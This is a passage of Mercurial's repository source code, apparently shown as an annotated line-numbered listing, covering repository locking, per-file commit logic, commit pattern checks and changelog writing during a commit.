1486 def invalidateall(self):
1486 '''Fully invalidates both store and non-store parts, causing the
1487 '''Fully invalidates both store and non-store parts, causing the
1487 subsequent operation to reread any outside changes.'''
1488 subsequent operation to reread any outside changes.'''
1488 # extension should hook this to invalidate its caches
1489 # extension should hook this to invalidate its caches
1489 self.invalidate()
1490 self.invalidate()
1490 self.invalidatedirstate()
1491 self.invalidatedirstate()
1491
1492
1492 @unfilteredmethod
1493 @unfilteredmethod
1493 def _refreshfilecachestats(self, tr):
1494 def _refreshfilecachestats(self, tr):
1494 """Reload stats of cached files so that they are flagged as valid"""
1495 """Reload stats of cached files so that they are flagged as valid"""
1495 for k, ce in self._filecache.items():
1496 for k, ce in self._filecache.items():
1496 if k == 'dirstate' or k not in self.__dict__:
1497 if k == 'dirstate' or k not in self.__dict__:
1497 continue
1498 continue
1498 ce.refresh()
1499 ce.refresh()
1499
1500
1500 def _lock(self, vfs, lockname, wait, releasefn, acquirefn, desc,
1501 def _lock(self, vfs, lockname, wait, releasefn, acquirefn, desc,
1501 inheritchecker=None, parentenvvar=None):
1502 inheritchecker=None, parentenvvar=None):
1502 parentlock = None
1503 parentlock = None
1503 # the contents of parentenvvar are used by the underlying lock to
1504 # the contents of parentenvvar are used by the underlying lock to
1504 # determine whether it can be inherited
1505 # determine whether it can be inherited
1505 if parentenvvar is not None:
1506 if parentenvvar is not None:
1506 parentlock = encoding.environ.get(parentenvvar)
1507 parentlock = encoding.environ.get(parentenvvar)
1507 try:
1508 try:
1508 l = lockmod.lock(vfs, lockname, 0, releasefn=releasefn,
1509 l = lockmod.lock(vfs, lockname, 0, releasefn=releasefn,
1509 acquirefn=acquirefn, desc=desc,
1510 acquirefn=acquirefn, desc=desc,
1510 inheritchecker=inheritchecker,
1511 inheritchecker=inheritchecker,
1511 parentlock=parentlock)
1512 parentlock=parentlock)
1512 except error.LockHeld as inst:
1513 except error.LockHeld as inst:
1513 if not wait:
1514 if not wait:
1514 raise
1515 raise
1515 # show more details for new-style locks
1516 # show more details for new-style locks
1516 if ':' in inst.locker:
1517 if ':' in inst.locker:
1517 host, pid = inst.locker.split(":", 1)
1518 host, pid = inst.locker.split(":", 1)
1518 self.ui.warn(
1519 self.ui.warn(
1519 _("waiting for lock on %s held by process %r "
1520 _("waiting for lock on %s held by process %r "
1520 "on host %r\n") % (desc, pid, host))
1521 "on host %r\n") % (desc, pid, host))
1521 else:
1522 else:
1522 self.ui.warn(_("waiting for lock on %s held by %r\n") %
1523 self.ui.warn(_("waiting for lock on %s held by %r\n") %
1523 (desc, inst.locker))
1524 (desc, inst.locker))
1524 # default to 600 seconds timeout
1525 # default to 600 seconds timeout
1525 l = lockmod.lock(vfs, lockname,
1526 l = lockmod.lock(vfs, lockname,
1526 int(self.ui.config("ui", "timeout")),
1527 int(self.ui.config("ui", "timeout")),
1527 releasefn=releasefn, acquirefn=acquirefn,
1528 releasefn=releasefn, acquirefn=acquirefn,
1528 desc=desc)
1529 desc=desc)
1529 self.ui.warn(_("got lock after %s seconds\n") % l.delay)
1530 self.ui.warn(_("got lock after %s seconds\n") % l.delay)
1530 return l
1531 return l
1531
1532
1532 def _afterlock(self, callback):
1533 def _afterlock(self, callback):
1533 """add a callback to be run when the repository is fully unlocked
1534 """add a callback to be run when the repository is fully unlocked
1534
1535
1535 The callback will be executed when the outermost lock is released
1536 The callback will be executed when the outermost lock is released
1536 (with wlock being higher level than 'lock')."""
1537 (with wlock being higher level than 'lock')."""
1537 for ref in (self._wlockref, self._lockref):
1538 for ref in (self._wlockref, self._lockref):
1538 l = ref and ref()
1539 l = ref and ref()
1539 if l and l.held:
1540 if l and l.held:
1540 l.postrelease.append(callback)
1541 l.postrelease.append(callback)
1541 break
1542 break
1542 else: # no lock have been found.
1543 else: # no lock have been found.
1543 callback()
1544 callback()
1544
1545
1545 def lock(self, wait=True):
1546 def lock(self, wait=True):
1546 '''Lock the repository store (.hg/store) and return a weak reference
1547 '''Lock the repository store (.hg/store) and return a weak reference
1547 to the lock. Use this before modifying the store (e.g. committing or
1548 to the lock. Use this before modifying the store (e.g. committing or
1548 stripping). If you are opening a transaction, get a lock as well.)
1549 stripping). If you are opening a transaction, get a lock as well.)
1549
1550
1550 If both 'lock' and 'wlock' must be acquired, ensure you always acquires
1551 If both 'lock' and 'wlock' must be acquired, ensure you always acquires
1551 'wlock' first to avoid a dead-lock hazard.'''
1552 'wlock' first to avoid a dead-lock hazard.'''
1552 l = self._currentlock(self._lockref)
1553 l = self._currentlock(self._lockref)
1553 if l is not None:
1554 if l is not None:
1554 l.lock()
1555 l.lock()
1555 return l
1556 return l
1556
1557
1557 l = self._lock(self.svfs, "lock", wait, None,
1558 l = self._lock(self.svfs, "lock", wait, None,
1558 self.invalidate, _('repository %s') % self.origroot)
1559 self.invalidate, _('repository %s') % self.origroot)
1559 self._lockref = weakref.ref(l)
1560 self._lockref = weakref.ref(l)
1560 return l
1561 return l
1561
1562
1562 def _wlockchecktransaction(self):
1563 def _wlockchecktransaction(self):
1563 if self.currenttransaction() is not None:
1564 if self.currenttransaction() is not None:
1564 raise error.LockInheritanceContractViolation(
1565 raise error.LockInheritanceContractViolation(
1565 'wlock cannot be inherited in the middle of a transaction')
1566 'wlock cannot be inherited in the middle of a transaction')
1566
1567
1567 def wlock(self, wait=True):
1568 def wlock(self, wait=True):
1568 '''Lock the non-store parts of the repository (everything under
1569 '''Lock the non-store parts of the repository (everything under
1569 .hg except .hg/store) and return a weak reference to the lock.
1570 .hg except .hg/store) and return a weak reference to the lock.
1570
1571
1571 Use this before modifying files in .hg.
1572 Use this before modifying files in .hg.
1572
1573
1573 If both 'lock' and 'wlock' must be acquired, ensure you always acquires
1574 If both 'lock' and 'wlock' must be acquired, ensure you always acquires
1574 'wlock' first to avoid a dead-lock hazard.'''
1575 'wlock' first to avoid a dead-lock hazard.'''
1575 l = self._wlockref and self._wlockref()
1576 l = self._wlockref and self._wlockref()
1576 if l is not None and l.held:
1577 if l is not None and l.held:
1577 l.lock()
1578 l.lock()
1578 return l
1579 return l
1579
1580
1580 # We do not need to check for non-waiting lock acquisition. Such
1581 # We do not need to check for non-waiting lock acquisition. Such
1581 # acquisition would not cause dead-lock as they would just fail.
1582 # acquisition would not cause dead-lock as they would just fail.
1582 if wait and (self.ui.configbool('devel', 'all-warnings')
1583 if wait and (self.ui.configbool('devel', 'all-warnings')
1583 or self.ui.configbool('devel', 'check-locks')):
1584 or self.ui.configbool('devel', 'check-locks')):
1584 if self._currentlock(self._lockref) is not None:
1585 if self._currentlock(self._lockref) is not None:
1585 self.ui.develwarn('"wlock" acquired after "lock"')
1586 self.ui.develwarn('"wlock" acquired after "lock"')
1586
1587
1587 def unlock():
1588 def unlock():
1588 if self.dirstate.pendingparentchange():
1589 if self.dirstate.pendingparentchange():
1589 self.dirstate.invalidate()
1590 self.dirstate.invalidate()
1590 else:
1591 else:
1591 self.dirstate.write(None)
1592 self.dirstate.write(None)
1592
1593
1593 self._filecache['dirstate'].refresh()
1594 self._filecache['dirstate'].refresh()
1594
1595
1595 l = self._lock(self.vfs, "wlock", wait, unlock,
1596 l = self._lock(self.vfs, "wlock", wait, unlock,
1596 self.invalidatedirstate, _('working directory of %s') %
1597 self.invalidatedirstate, _('working directory of %s') %
1597 self.origroot,
1598 self.origroot,
1598 inheritchecker=self._wlockchecktransaction,
1599 inheritchecker=self._wlockchecktransaction,
1599 parentenvvar='HG_WLOCK_LOCKER')
1600 parentenvvar='HG_WLOCK_LOCKER')
1600 self._wlockref = weakref.ref(l)
1601 self._wlockref = weakref.ref(l)
1601 return l
1602 return l
1602
1603
1603 def _currentlock(self, lockref):
1604 def _currentlock(self, lockref):
1604 """Returns the lock if it's held, or None if it's not."""
1605 """Returns the lock if it's held, or None if it's not."""
1605 if lockref is None:
1606 if lockref is None:
1606 return None
1607 return None
1607 l = lockref()
1608 l = lockref()
1608 if l is None or not l.held:
1609 if l is None or not l.held:
1609 return None
1610 return None
1610 return l
1611 return l
1611
1612
1612 def currentwlock(self):
1613 def currentwlock(self):
1613 """Returns the wlock if it's held, or None if it's not."""
1614 """Returns the wlock if it's held, or None if it's not."""
1614 return self._currentlock(self._wlockref)
1615 return self._currentlock(self._wlockref)
1615
1616
1616 def _filecommit(self, fctx, manifest1, manifest2, linkrev, tr, changelist):
1617 def _filecommit(self, fctx, manifest1, manifest2, linkrev, tr, changelist):
1617 """
1618 """
1618 commit an individual file as part of a larger transaction
1619 commit an individual file as part of a larger transaction
1619 """
1620 """
1620
1621
1621 fname = fctx.path()
1622 fname = fctx.path()
1622 fparent1 = manifest1.get(fname, nullid)
1623 fparent1 = manifest1.get(fname, nullid)
1623 fparent2 = manifest2.get(fname, nullid)
1624 fparent2 = manifest2.get(fname, nullid)
1624 if isinstance(fctx, context.filectx):
1625 if isinstance(fctx, context.filectx):
1625 node = fctx.filenode()
1626 node = fctx.filenode()
1626 if node in [fparent1, fparent2]:
1627 if node in [fparent1, fparent2]:
1627 self.ui.debug('reusing %s filelog entry\n' % fname)
1628 self.ui.debug('reusing %s filelog entry\n' % fname)
1628 if manifest1.flags(fname) != fctx.flags():
1629 if manifest1.flags(fname) != fctx.flags():
1629 changelist.append(fname)
1630 changelist.append(fname)
1630 return node
1631 return node
1631
1632
1632 flog = self.file(fname)
1633 flog = self.file(fname)
1633 meta = {}
1634 meta = {}
1634 copy = fctx.renamed()
1635 copy = fctx.renamed()
1635 if copy and copy[0] != fname:
1636 if copy and copy[0] != fname:
1636 # Mark the new revision of this file as a copy of another
1637 # Mark the new revision of this file as a copy of another
1637 # file. This copy data will effectively act as a parent
1638 # file. This copy data will effectively act as a parent
1638 # of this new revision. If this is a merge, the first
1639 # of this new revision. If this is a merge, the first
1639 # parent will be the nullid (meaning "look up the copy data")
1640 # parent will be the nullid (meaning "look up the copy data")
1640 # and the second one will be the other parent. For example:
1641 # and the second one will be the other parent. For example:
1641 #
1642 #
1642 # 0 --- 1 --- 3 rev1 changes file foo
1643 # 0 --- 1 --- 3 rev1 changes file foo
1643 # \ / rev2 renames foo to bar and changes it
1644 # \ / rev2 renames foo to bar and changes it
1644 # \- 2 -/ rev3 should have bar with all changes and
1645 # \- 2 -/ rev3 should have bar with all changes and
1645 # should record that bar descends from
1646 # should record that bar descends from
1646 # bar in rev2 and foo in rev1
1647 # bar in rev2 and foo in rev1
1647 #
1648 #
1648 # this allows this merge to succeed:
1649 # this allows this merge to succeed:
1649 #
1650 #
1650 # 0 --- 1 --- 3 rev4 reverts the content change from rev2
1651 # 0 --- 1 --- 3 rev4 reverts the content change from rev2
1651 # \ / merging rev3 and rev4 should use bar@rev2
1652 # \ / merging rev3 and rev4 should use bar@rev2
1652 # \- 2 --- 4 as the merge base
1653 # \- 2 --- 4 as the merge base
1653 #
1654 #
1654
1655
1655 cfname = copy[0]
1656 cfname = copy[0]
1656 crev = manifest1.get(cfname)
1657 crev = manifest1.get(cfname)
1657 newfparent = fparent2
1658 newfparent = fparent2
1658
1659
1659 if manifest2: # branch merge
1660 if manifest2: # branch merge
1660 if fparent2 == nullid or crev is None: # copied on remote side
1661 if fparent2 == nullid or crev is None: # copied on remote side
1661 if cfname in manifest2:
1662 if cfname in manifest2:
1662 crev = manifest2[cfname]
1663 crev = manifest2[cfname]
1663 newfparent = fparent1
1664 newfparent = fparent1
1664
1665
1665 # Here, we used to search backwards through history to try to find
1666 # Here, we used to search backwards through history to try to find
1666 # where the file copy came from if the source of a copy was not in
1667 # where the file copy came from if the source of a copy was not in
1667 # the parent directory. However, this doesn't actually make sense to
1668 # the parent directory. However, this doesn't actually make sense to
1668 # do (what does a copy from something not in your working copy even
1669 # do (what does a copy from something not in your working copy even
1669 # mean?) and it causes bugs (eg, issue4476). Instead, we will warn
1670 # mean?) and it causes bugs (eg, issue4476). Instead, we will warn
1670 # the user that copy information was dropped, so if they didn't
1671 # the user that copy information was dropped, so if they didn't
1671 # expect this outcome it can be fixed, but this is the correct
1672 # expect this outcome it can be fixed, but this is the correct
1672 # behavior in this circumstance.
1673 # behavior in this circumstance.
1673
1674
1674 if crev:
1675 if crev:
1675 self.ui.debug(" %s: copy %s:%s\n" % (fname, cfname, hex(crev)))
1676 self.ui.debug(" %s: copy %s:%s\n" % (fname, cfname, hex(crev)))
1676 meta["copy"] = cfname
1677 meta["copy"] = cfname
1677 meta["copyrev"] = hex(crev)
1678 meta["copyrev"] = hex(crev)
1678 fparent1, fparent2 = nullid, newfparent
1679 fparent1, fparent2 = nullid, newfparent
1679 else:
1680 else:
1680 self.ui.warn(_("warning: can't find ancestor for '%s' "
1681 self.ui.warn(_("warning: can't find ancestor for '%s' "
1681 "copied from '%s'!\n") % (fname, cfname))
1682 "copied from '%s'!\n") % (fname, cfname))
1682
1683
1683 elif fparent1 == nullid:
1684 elif fparent1 == nullid:
1684 fparent1, fparent2 = fparent2, nullid
1685 fparent1, fparent2 = fparent2, nullid
1685 elif fparent2 != nullid:
1686 elif fparent2 != nullid:
1686 # is one parent an ancestor of the other?
1687 # is one parent an ancestor of the other?
1687 fparentancestors = flog.commonancestorsheads(fparent1, fparent2)
1688 fparentancestors = flog.commonancestorsheads(fparent1, fparent2)
1688 if fparent1 in fparentancestors:
1689 if fparent1 in fparentancestors:
1689 fparent1, fparent2 = fparent2, nullid
1690 fparent1, fparent2 = fparent2, nullid
1690 elif fparent2 in fparentancestors:
1691 elif fparent2 in fparentancestors:
1691 fparent2 = nullid
1692 fparent2 = nullid
1692
1693
1693 # is the file changed?
1694 # is the file changed?
1694 text = fctx.data()
1695 text = fctx.data()
1695 if fparent2 != nullid or flog.cmp(fparent1, text) or meta:
1696 if fparent2 != nullid or flog.cmp(fparent1, text) or meta:
1696 changelist.append(fname)
1697 changelist.append(fname)
1697 return flog.add(text, meta, tr, linkrev, fparent1, fparent2)
1698 return flog.add(text, meta, tr, linkrev, fparent1, fparent2)
1698 # are just the flags changed during merge?
1699 # are just the flags changed during merge?
1699 elif fname in manifest1 and manifest1.flags(fname) != fctx.flags():
1700 elif fname in manifest1 and manifest1.flags(fname) != fctx.flags():
1700 changelist.append(fname)
1701 changelist.append(fname)
1701
1702
1702 return fparent1
1703 return fparent1
1703
1704
1704 def checkcommitpatterns(self, wctx, vdirs, match, status, fail):
1705 def checkcommitpatterns(self, wctx, vdirs, match, status, fail):
1705 """check for commit arguments that aren't committable"""
1706 """check for commit arguments that aren't committable"""
1706 if match.isexact() or match.prefix():
1707 if match.isexact() or match.prefix():
1707 matched = set(status.modified + status.added + status.removed)
1708 matched = set(status.modified + status.added + status.removed)
1708
1709
1709 for f in match.files():
1710 for f in match.files():
1710 f = self.dirstate.normalize(f)
1711 f = self.dirstate.normalize(f)
1711 if f == '.' or f in matched or f in wctx.substate:
1712 if f == '.' or f in matched or f in wctx.substate:
1712 continue
1713 continue
1713 if f in status.deleted:
1714 if f in status.deleted:
1714 fail(f, _('file not found!'))
1715 fail(f, _('file not found!'))
1715 if f in vdirs: # visited directory
1716 if f in vdirs: # visited directory
1716 d = f + '/'
1717 d = f + '/'
1717 for mf in matched:
1718 for mf in matched:
1718 if mf.startswith(d):
1719 if mf.startswith(d):
1719 break
1720 break
1720 else:
1721 else:
1721 fail(f, _("no match under directory!"))
1722 fail(f, _("no match under directory!"))
1722 elif f not in self.dirstate:
1723 elif f not in self.dirstate:
1723 fail(f, _("file not tracked!"))
1724 fail(f, _("file not tracked!"))
1724
1725
1725 @unfilteredmethod
1726 @unfilteredmethod
1726 def commit(self, text="", user=None, date=None, match=None, force=False,
1727 def commit(self, text="", user=None, date=None, match=None, force=False,
1727 editor=False, extra=None):
1728 editor=False, extra=None):
1728 """Add a new revision to current repository.
1729 """Add a new revision to current repository.
1729
1730
1730 Revision information is gathered from the working directory,
1731 Revision information is gathered from the working directory,
1731 match can be used to filter the committed files. If editor is
1732 match can be used to filter the committed files. If editor is
1732 supplied, it is called to get a commit message.
1733 supplied, it is called to get a commit message.
1733 """
1734 """
1734 if extra is None:
1735 if extra is None:
1735 extra = {}
1736 extra = {}
1736
1737
1737 def fail(f, msg):
1738 def fail(f, msg):
1738 raise error.Abort('%s: %s' % (f, msg))
1739 raise error.Abort('%s: %s' % (f, msg))
1739
1740
1740 if not match:
1741 if not match:
1741 match = matchmod.always(self.root, '')
1742 match = matchmod.always(self.root, '')
1742
1743
1743 if not force:
1744 if not force:
1744 vdirs = []
1745 vdirs = []
1745 match.explicitdir = vdirs.append
1746 match.explicitdir = vdirs.append
1746 match.bad = fail
1747 match.bad = fail
1747
1748
1748 wlock = lock = tr = None
1749 wlock = lock = tr = None
1749 try:
1750 try:
1750 wlock = self.wlock()
1751 wlock = self.wlock()
1751 lock = self.lock() # for recent changelog (see issue4368)
1752 lock = self.lock() # for recent changelog (see issue4368)
1752
1753
1753 wctx = self[None]
1754 wctx = self[None]
1754 merge = len(wctx.parents()) > 1
1755 merge = len(wctx.parents()) > 1
1755
1756
1756 if not force and merge and not match.always():
1757 if not force and merge and not match.always():
1757 raise error.Abort(_('cannot partially commit a merge '
1758 raise error.Abort(_('cannot partially commit a merge '
1758 '(do not specify files or patterns)'))
1759 '(do not specify files or patterns)'))
1759
1760
1760 status = self.status(match=match, clean=force)
1761 status = self.status(match=match, clean=force)
1761 if force:
1762 if force:
1762 status.modified.extend(status.clean) # mq may commit clean files
1763 status.modified.extend(status.clean) # mq may commit clean files
1763
1764
1764 # check subrepos
1765 # check subrepos
1765 subs = []
1766 subs = []
1766 commitsubs = set()
1767 commitsubs = set()
1767 newstate = wctx.substate.copy()
1768 newstate = wctx.substate.copy()
1768 # only manage subrepos and .hgsubstate if .hgsub is present
1769 # only manage subrepos and .hgsubstate if .hgsub is present
1769 if '.hgsub' in wctx:
1770 if '.hgsub' in wctx:
1770 # we'll decide whether to track this ourselves, thanks
1771 # we'll decide whether to track this ourselves, thanks
1771 for c in status.modified, status.added, status.removed:
1772 for c in status.modified, status.added, status.removed:
1772 if '.hgsubstate' in c:
1773 if '.hgsubstate' in c:
1773 c.remove('.hgsubstate')
1774 c.remove('.hgsubstate')
1774
1775
1775 # compare current state to last committed state
1776 # compare current state to last committed state
1776 # build new substate based on last committed state
1777 # build new substate based on last committed state
1777 oldstate = wctx.p1().substate
1778 oldstate = wctx.p1().substate
1778 for s in sorted(newstate.keys()):
1779 for s in sorted(newstate.keys()):
1779 if not match(s):
1780 if not match(s):
1780 # ignore working copy, use old state if present
1781 # ignore working copy, use old state if present
1781 if s in oldstate:
1782 if s in oldstate:
1782 newstate[s] = oldstate[s]
1783 newstate[s] = oldstate[s]
1783 continue
1784 continue
1784 if not force:
1785 if not force:
1785 raise error.Abort(
1786 raise error.Abort(
1786 _("commit with new subrepo %s excluded") % s)
1787 _("commit with new subrepo %s excluded") % s)
1787 dirtyreason = wctx.sub(s).dirtyreason(True)
1788 dirtyreason = wctx.sub(s).dirtyreason(True)
1788 if dirtyreason:
1789 if dirtyreason:
1789 if not self.ui.configbool('ui', 'commitsubrepos'):
1790 if not self.ui.configbool('ui', 'commitsubrepos'):
1790 raise error.Abort(dirtyreason,
1791 raise error.Abort(dirtyreason,
1791 hint=_("use --subrepos for recursive commit"))
1792 hint=_("use --subrepos for recursive commit"))
1792 subs.append(s)
1793 subs.append(s)
1793 commitsubs.add(s)
1794 commitsubs.add(s)
1794 else:
1795 else:
1795 bs = wctx.sub(s).basestate()
1796 bs = wctx.sub(s).basestate()
1796 newstate[s] = (newstate[s][0], bs, newstate[s][2])
1797 newstate[s] = (newstate[s][0], bs, newstate[s][2])
1797 if oldstate.get(s, (None, None, None))[1] != bs:
1798 if oldstate.get(s, (None, None, None))[1] != bs:
1798 subs.append(s)
1799 subs.append(s)
1799
1800
1800 # check for removed subrepos
1801 # check for removed subrepos
1801 for p in wctx.parents():
1802 for p in wctx.parents():
1802 r = [s for s in p.substate if s not in newstate]
1803 r = [s for s in p.substate if s not in newstate]
1803 subs += [s for s in r if match(s)]
1804 subs += [s for s in r if match(s)]
1804 if subs:
1805 if subs:
1805 if (not match('.hgsub') and
1806 if (not match('.hgsub') and
1806 '.hgsub' in (wctx.modified() + wctx.added())):
1807 '.hgsub' in (wctx.modified() + wctx.added())):
1807 raise error.Abort(
1808 raise error.Abort(
1808 _("can't commit subrepos without .hgsub"))
1809 _("can't commit subrepos without .hgsub"))
1809 status.modified.insert(0, '.hgsubstate')
1810 status.modified.insert(0, '.hgsubstate')
1810
1811
1811 elif '.hgsub' in status.removed:
1812 elif '.hgsub' in status.removed:
1812 # clean up .hgsubstate when .hgsub is removed
1813 # clean up .hgsubstate when .hgsub is removed
1813 if ('.hgsubstate' in wctx and
1814 if ('.hgsubstate' in wctx and
1814 '.hgsubstate' not in (status.modified + status.added +
1815 '.hgsubstate' not in (status.modified + status.added +
1815 status.removed)):
1816 status.removed)):
1816 status.removed.insert(0, '.hgsubstate')
1817 status.removed.insert(0, '.hgsubstate')
1817
1818
1818 # make sure all explicit patterns are matched
1819 # make sure all explicit patterns are matched
1819 if not force:
1820 if not force:
1820 self.checkcommitpatterns(wctx, vdirs, match, status, fail)
1821 self.checkcommitpatterns(wctx, vdirs, match, status, fail)
1821
1822
1822 cctx = context.workingcommitctx(self, status,
1823 cctx = context.workingcommitctx(self, status,
1823 text, user, date, extra)
1824 text, user, date, extra)
1824
1825
1825 # internal config: ui.allowemptycommit
1826 # internal config: ui.allowemptycommit
1826 allowemptycommit = (wctx.branch() != wctx.p1().branch()
1827 allowemptycommit = (wctx.branch() != wctx.p1().branch()
1827 or extra.get('close') or merge or cctx.files()
1828 or extra.get('close') or merge or cctx.files()
1828 or self.ui.configbool('ui', 'allowemptycommit'))
1829 or self.ui.configbool('ui', 'allowemptycommit'))
1829 if not allowemptycommit:
1830 if not allowemptycommit:
1830 return None
1831 return None
1831
1832
1832 if merge and cctx.deleted():
1833 if merge and cctx.deleted():
1833 raise error.Abort(_("cannot commit merge with missing files"))
1834 raise error.Abort(_("cannot commit merge with missing files"))
1834
1835
1835 ms = mergemod.mergestate.read(self)
1836 ms = mergemod.mergestate.read(self)
1836 mergeutil.checkunresolved(ms)
1837 mergeutil.checkunresolved(ms)
1837
1838
1838 if editor:
1839 if editor:
1839 cctx._text = editor(self, cctx, subs)
1840 cctx._text = editor(self, cctx, subs)
1840 edited = (text != cctx._text)
1841 edited = (text != cctx._text)
1841
1842
1842 # Save commit message in case this transaction gets rolled back
1843 # Save commit message in case this transaction gets rolled back
1843 # (e.g. by a pretxncommit hook). Leave the content alone on
1844 # (e.g. by a pretxncommit hook). Leave the content alone on
1844 # the assumption that the user will use the same editor again.
1845 # the assumption that the user will use the same editor again.
1845 msgfn = self.savecommitmessage(cctx._text)
1846 msgfn = self.savecommitmessage(cctx._text)
1846
1847
1847 # commit subs and write new state
1848 # commit subs and write new state
1848 if subs:
1849 if subs:
1849 for s in sorted(commitsubs):
1850 for s in sorted(commitsubs):
1850 sub = wctx.sub(s)
1851 sub = wctx.sub(s)
1851 self.ui.status(_('committing subrepository %s\n') %
1852 self.ui.status(_('committing subrepository %s\n') %
1852 subrepo.subrelpath(sub))
1853 subrepo.subrelpath(sub))
1853 sr = sub.commit(cctx._text, user, date)
1854 sr = sub.commit(cctx._text, user, date)
1854 newstate[s] = (newstate[s][0], sr)
1855 newstate[s] = (newstate[s][0], sr)
1855 subrepo.writestate(self, newstate)
1856 subrepo.writestate(self, newstate)
1856
1857
1857 p1, p2 = self.dirstate.parents()
1858 p1, p2 = self.dirstate.parents()
1858 hookp1, hookp2 = hex(p1), (p2 != nullid and hex(p2) or '')
1859 hookp1, hookp2 = hex(p1), (p2 != nullid and hex(p2) or '')
1859 try:
1860 try:
1860 self.hook("precommit", throw=True, parent1=hookp1,
1861 self.hook("precommit", throw=True, parent1=hookp1,
1861 parent2=hookp2)
1862 parent2=hookp2)
1862 tr = self.transaction('commit')
1863 tr = self.transaction('commit')
1863 ret = self.commitctx(cctx, True)
1864 ret = self.commitctx(cctx, True)
1864 except: # re-raises
1865 except: # re-raises
1865 if edited:
1866 if edited:
1866 self.ui.write(
1867 self.ui.write(
1867 _('note: commit message saved in %s\n') % msgfn)
1868 _('note: commit message saved in %s\n') % msgfn)
1868 raise
1869 raise
1869 # update bookmarks, dirstate and mergestate
1870 # update bookmarks, dirstate and mergestate
1870 bookmarks.update(self, [p1, p2], ret)
1871 bookmarks.update(self, [p1, p2], ret)
1871 cctx.markcommitted(ret)
1872 cctx.markcommitted(ret)
1872 ms.reset()
1873 ms.reset()
1873 tr.close()
1874 tr.close()
1874
1875
1875 finally:
1876 finally:
1876 lockmod.release(tr, lock, wlock)
1877 lockmod.release(tr, lock, wlock)
1877
1878
1878 def commithook(node=hex(ret), parent1=hookp1, parent2=hookp2):
1879 def commithook(node=hex(ret), parent1=hookp1, parent2=hookp2):
1879 # hack for command that use a temporary commit (eg: histedit)
1880 # hack for command that use a temporary commit (eg: histedit)
1880 # temporary commit got stripped before hook release
1881 # temporary commit got stripped before hook release
1881 if self.changelog.hasnode(ret):
1882 if self.changelog.hasnode(ret):
1882 self.hook("commit", node=node, parent1=parent1,
1883 self.hook("commit", node=node, parent1=parent1,
1883 parent2=parent2)
1884 parent2=parent2)
1884 self._afterlock(commithook)
1885 self._afterlock(commithook)
1885 return ret
1886 return ret
1886
1887
1887 @unfilteredmethod
1888 @unfilteredmethod
1888 def commitctx(self, ctx, error=False):
1889 def commitctx(self, ctx, error=False):
1889 """Add a new revision to current repository.
1890 """Add a new revision to current repository.
1890 Revision information is passed via the context argument.
1891 Revision information is passed via the context argument.
1891 """
1892 """
1892
1893
1893 tr = None
1894 tr = None
1894 p1, p2 = ctx.p1(), ctx.p2()
1895 p1, p2 = ctx.p1(), ctx.p2()
1895 user = ctx.user()
1896 user = ctx.user()
1896
1897
1897 lock = self.lock()
1898 lock = self.lock()
1898 try:
1899 try:
1899 tr = self.transaction("commit")
1900 tr = self.transaction("commit")
1900 trp = weakref.proxy(tr)
1901 trp = weakref.proxy(tr)
1901
1902
1902 if ctx.manifestnode():
1903 if ctx.manifestnode():
1903 # reuse an existing manifest revision
1904 # reuse an existing manifest revision
1904 mn = ctx.manifestnode()
1905 mn = ctx.manifestnode()
1905 files = ctx.files()
1906 files = ctx.files()
1906 elif ctx.files():
1907 elif ctx.files():
1907 m1ctx = p1.manifestctx()
1908 m1ctx = p1.manifestctx()
1908 m2ctx = p2.manifestctx()
1909 m2ctx = p2.manifestctx()
1909 mctx = m1ctx.copy()
1910 mctx = m1ctx.copy()
1910
1911
1911 m = mctx.read()
1912 m = mctx.read()
1912 m1 = m1ctx.read()
1913 m1 = m1ctx.read()
1913 m2 = m2ctx.read()
1914 m2 = m2ctx.read()
1914
1915
1915 # check in files
1916 # check in files
1916 added = []
1917 added = []
1917 changed = []
1918 changed = []
1918 removed = list(ctx.removed())
1919 removed = list(ctx.removed())
1919 linkrev = len(self)
1920 linkrev = len(self)
1920 self.ui.note(_("committing files:\n"))
1921 self.ui.note(_("committing files:\n"))
1921 for f in sorted(ctx.modified() + ctx.added()):
1922 for f in sorted(ctx.modified() + ctx.added()):
1922 self.ui.note(f + "\n")
1923 self.ui.note(f + "\n")
1923 try:
1924 try:
1924 fctx = ctx[f]
1925 fctx = ctx[f]
1925 if fctx is None:
1926 if fctx is None:
1926 removed.append(f)
1927 removed.append(f)
1927 else:
1928 else:
1928 added.append(f)
1929 added.append(f)
1929 m[f] = self._filecommit(fctx, m1, m2, linkrev,
1930 m[f] = self._filecommit(fctx, m1, m2, linkrev,
1930 trp, changed)
1931 trp, changed)
1931 m.setflag(f, fctx.flags())
1932 m.setflag(f, fctx.flags())
1932 except OSError as inst:
1933 except OSError as inst:
1933 self.ui.warn(_("trouble committing %s!\n") % f)
1934 self.ui.warn(_("trouble committing %s!\n") % f)
1934 raise
1935 raise
1935 except IOError as inst:
1936 except IOError as inst:
1936 errcode = getattr(inst, 'errno', errno.ENOENT)
1937 errcode = getattr(inst, 'errno', errno.ENOENT)
1937 if error or errcode and errcode != errno.ENOENT:
1938 if error or errcode and errcode != errno.ENOENT:
1938 self.ui.warn(_("trouble committing %s!\n") % f)
1939 self.ui.warn(_("trouble committing %s!\n") % f)
1939 raise
1940 raise
1940
1941
1941 # update manifest
1942 # update manifest
1942 self.ui.note(_("committing manifest\n"))
1943 self.ui.note(_("committing manifest\n"))
1943 removed = [f for f in sorted(removed) if f in m1 or f in m2]
1944 removed = [f for f in sorted(removed) if f in m1 or f in m2]
1944 drop = [f for f in removed if f in m]
1945 drop = [f for f in removed if f in m]
1945 for f in drop:
1946 for f in drop:
1946 del m[f]
1947 del m[f]
1947 mn = mctx.write(trp, linkrev,
1948 mn = mctx.write(trp, linkrev,
1948 p1.manifestnode(), p2.manifestnode(),
1949 p1.manifestnode(), p2.manifestnode(),
1949 added, drop)
1950 added, drop)
1950 files = changed + removed
1951 files = changed + removed
1951 else:
1952 else:
1952 mn = p1.manifestnode()
1953 mn = p1.manifestnode()
1953 files = []
1954 files = []
1954
1955
1955 # update changelog
1956 # update changelog
1956 self.ui.note(_("committing changelog\n"))
1957 self.ui.note(_("committing changelog\n"))
1957 self.changelog.delayupdate(tr)
1958 self.changelog.delayupdate(tr)
1958 n = self.changelog.add(mn, files, ctx.description(),
1959 n = self.changelog.add(mn, files, ctx.description(),
1959 trp, p1.node(), p2.node(),
1960 trp, p1.node(), p2.node(),
1960 user, ctx.date(), ctx.extra().copy())
1961 user, ctx.date(), ctx.extra().copy())
1961 xp1, xp2 = p1.hex(), p2 and p2.hex() or ''
1962 xp1, xp2 = p1.hex(), p2 and p2.hex() or ''
1962 self.hook('pretxncommit', throw=True, node=hex(n), parent1=xp1,
1963 self.hook('pretxncommit', throw=True, node=hex(n), parent1=xp1,
1963 parent2=xp2)
